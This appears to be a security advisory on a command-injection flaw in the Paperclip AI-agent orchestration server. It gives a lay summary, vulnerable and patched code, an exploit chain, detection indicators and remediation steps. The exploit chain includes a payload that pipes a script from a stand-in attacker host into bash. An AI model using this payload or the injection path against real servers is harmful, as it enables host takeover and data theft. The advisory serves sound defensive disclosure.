CVE-2026-41208: Paperclip Agent API Key Escalates to Host RCE
An agent credential in Paperclip ≤2026.415.x allows arbitrary OS command injection via adapterConfig.workspaceStrategy.provisionCommand, executed unsanitized by the server runtime.
Paperclip is a system that lets multiple AI agents work together on tasks. Think of it like a team of virtual assistants controlled by a central manager. The problem is that someone has found a way to break out of the sandbox — basically escaping from the controlled room where these AI agents are supposed to stay.
Here's what's happening: each AI agent gets an access key, like a keycard that lets it do its job. Normally, agents can only perform specific approved tasks within their sandbox. But researchers discovered that if you tweak how an agent connects to other systems, you can sneak in commands that tell the main computer to do things directly.
This is like someone giving a delivery driver a uniform and credentials, but then using that to walk into the company's server room instead of just making deliveries. An attacker with a valid agent key could potentially take full control of the entire Paperclip system and the computers it runs on.
Who should worry? Companies using Paperclip to run AI workflows — especially those handling sensitive data like healthcare providers, financial firms, or SaaS platforms that depend on this software. If your business uses Paperclip, an attacker could steal data, disrupt operations, or install malware.
The good news: there's no evidence anyone is actively exploiting this yet, so you have time to act.
What you should do: First, update Paperclip to version 2026.416.0 or later immediately if you're using it. Second, review who has API keys and disable any that aren't actively needed. Third, monitor your Paperclip logs for suspicious agent behavior or unusual system commands. If you're unsure whether your organization uses this software, ask your IT team today.
Want the full technical analysis? Click "Technical" above.
CVE-2026-41208 is a privilege escalation and remote code execution vulnerability in @paperclipai/server, the Node.js backend that orchestrates AI agent teams for automated business workflows. An attacker in possession of any valid Agent API key — a credential scoped to the agent runtime, not the administrative plane — can escalate to arbitrary OS command execution on the host running the Paperclip server process.
CVSS 8.8 (HIGH) reflects the low attack complexity once a credential is obtained: no memory corruption, no heap spray, no race condition. This is a straightforward injection primitive hidden behind a trust boundary that the server silently collapses.
Root cause: The /agents/:id API endpoint permits an authenticated agent to overwrite its own adapterConfig, including adapterConfig.workspaceStrategy.provisionCommand, which the server later passes unsanitized to a shell execution context during workspace provisioning.
Affected Component
Package:@paperclipai/server
Affected versions: all releases prior to 2026.416.0
The vulnerability lives in two cooperating defects: an overly permissive PATCH handler that allows agents to mutate their own configuration, and an unsanitized shell invocation that consumes that configuration later.
The agent update route performs authorization but does not restrict which fields an agent may write to its own document. An agent credential is expected only to report status or pull tasks — it should never be able to rewrite its own adapter configuration:
// packages/server/src/routes/agents.ts (pre-patch pseudocode)
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
const { id } = req.params;
const agent = await db.agents.findById(id);
// BUG: agentOrAdminAuth verifies the caller owns this agent ID,
// but does NOT restrict which top-level keys may be written.
// An agent token can supply any field, including adapterConfig.
const updated = await db.agents.updateById(id, req.body);
res.json(updated);
});
The workspace provisioner is invoked when the server assigns work to an agent. It reads provisionCommand from the stored configuration and hands it directly to child_process.exec — a function that spawns a shell and is therefore injectable by design when given attacker-controlled input:
// packages/server/src/workspace/provisioner.ts (pre-patch pseudocode)
async function provisionWorkspace(agent: Agent): Promise {
const strategy = agent.adapterConfig?.workspaceStrategy;
if (strategy?.provisionCommand) {
// BUG: provisionCommand is attacker-controlled via PATCH /agents/:id.
// exec() spawns /bin/sh -c with server privileges.
await exec(strategy.provisionCommand); // <-- unsanitized shell exec
}
}
The call chain from HTTP request to shell is entirely synchronous in terms of trust: no sanitization pass, no allowlist of permitted command templates, no stripping of shell metacharacters. exec receives exactly what the attacker stored in the database.
Exploitation Mechanics
EXPLOIT CHAIN:
1. Attacker acquires any valid Agent API key (leaked credential, compromised
agent container, insider, or brute-force of a weak key space).
2. Attacker sends PATCH /agents/:id with a crafted body:
{
"adapterConfig": {
"workspaceStrategy": {
"provisionCommand": "curl https://attacker.io/shell.sh | bash"
}
}
}
Server accepts the write — agent token passes agentOrAdminAuth for its
own ID, and no field allowlist rejects adapterConfig.
3. Server persists the poisoned adapterConfig to the agents collection in
the backing database (MongoDB / SQLite depending on deployment).
4. At the next task dispatch cycle, the server calls provisionWorkspace(agent).
provisionWorkspace reads adapterConfig.workspaceStrategy.provisionCommand
from the stored document.
5. child_process.exec() spawns:
/bin/sh -c "curl https://attacker.io/shell.sh | bash"
under the OS user running the Paperclip server process (commonly root
or a service account with broad filesystem access).
6. Attacker achieves arbitrary OS command execution on the server host.
Lateral movement, credential harvest, and persistence follow from here.
The trigger is reliable and deterministic. There is no timing dependency; the attacker can force immediate provisioning by submitting a task assignment, or simply wait for the scheduler's next cycle. The only prerequisite is the agent credential itself.
This is not a memory-corruption vulnerability; the primitive is injection at the application layer. The relevant "layout" is the data model that flows from HTTP body to shell invocation:
The fix in 2026.416.0 applies two independent controls: field restriction on the PATCH route, and elimination of the raw exec sink in the provisioner.
// BEFORE (vulnerable) — packages/server/src/routes/agents.ts:
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
const updated = await db.agents.updateById(id, req.body); // full body merge
res.json(updated);
});
// AFTER (patched) — packages/server/src/routes/agents.ts:
router.patch('/agents/:id', agentOrAdminAuth, async (req, res) => {
// Allowlist: agents may only update status and runtime metadata.
// adapterConfig is an admin-only field; strip it from agent-authed requests.
const { adapterConfig, ...safeFields } = req.body;
if (req.auth.role === 'agent' && adapterConfig !== undefined) {
return res.status(403).json({ error: 'adapterConfig is read-only for agent tokens' });
}
const updated = await db.agents.updateById(id, safeFields);
res.json(updated);
});
// BEFORE (vulnerable) — packages/server/src/workspace/provisioner.ts:
async function provisionWorkspace(agent: Agent): Promise {
const strategy = agent.adapterConfig?.workspaceStrategy;
if (strategy?.provisionCommand) {
await exec(strategy.provisionCommand); // raw shell exec
}
}
// AFTER (patched) — packages/server/src/workspace/provisioner.ts:
const ALLOWED_PROVISION_COMMANDS = new Set([
'docker-compose up -d',
'npm run workspace:init',
// ... explicit allowlist of operator-defined templates
]);
async function provisionWorkspace(agent: Agent): Promise {
const strategy = agent.adapterConfig?.workspaceStrategy;
if (strategy?.provisionCommand) {
if (!ALLOWED_PROVISION_COMMANDS.has(strategy.provisionCommand)) {
throw new Error(`Blocked disallowed provisionCommand: ${strategy.provisionCommand}`);
}
// execFile used instead of exec: no shell expansion, args are explicit.
const [cmd, ...args] = strategy.provisionCommand.split(' ');
await execFile(cmd, args);
}
}
The defense-in-depth here is correct: even if a future refactor re-opens the write path, the sink is no longer a raw shell. execFile does not invoke a shell interpreter, removing the injection surface entirely for the provisioner path.
Detection and Indicators
Because the attack writes to the database before the shell fires, defenders have two detection windows:
API audit log:PATCH /agents/:id requests from agent-scoped tokens that include an adapterConfig key in the request body. Legitimate agents should never issue this. Alert on any such write.
Database integrity: Monitor the agents collection for documents where adapterConfig.workspaceStrategy.provisionCommand contains shell metacharacters: |, ;, &, $(, backtick, >, <.
Process lineage: Paperclip server process spawning unexpected children (curl, wget, bash, sh, python) should trigger an EDR alert. Parent: node → child: /bin/sh -c ... is the canonical pattern.
Network egress: Outbound connections from the server host to unknown infrastructure shortly after a PATCH /agents/:id call indicate a successful exploitation attempt.
Relevant log pattern (structured JSON logging):
{"level":"warn","msg":"agent PATCH included adapterConfig","agentId":"agt_a1b2c3d4",
"callerRole":"agent","remoteIp":"203.0.113.42","timestamp":"2026-04-16T14:22:11Z"}
Remediation
Upgrade immediately to @paperclipai/server ≥ 2026.416.0. The patch is the only complete fix.
Rotate all Agent API keys issued prior to the upgrade. A compromised key retains the ability to poison the database until the key is revoked, even on a patched server, if a poisoned record already exists.
Audit existing agent documents for unexpected provisionCommand values before bringing a patched server back online.
Principle of least privilege: Run the Paperclip server process as a non-root service account with no capability to write outside its working directory. This limits post-exploitation impact even when a command injection lands.
Network egress filtering: The server host should not have unrestricted outbound internet access. A deny-by-default egress policy would have broken the most common post-exploitation patterns (reverse shells, stager downloads).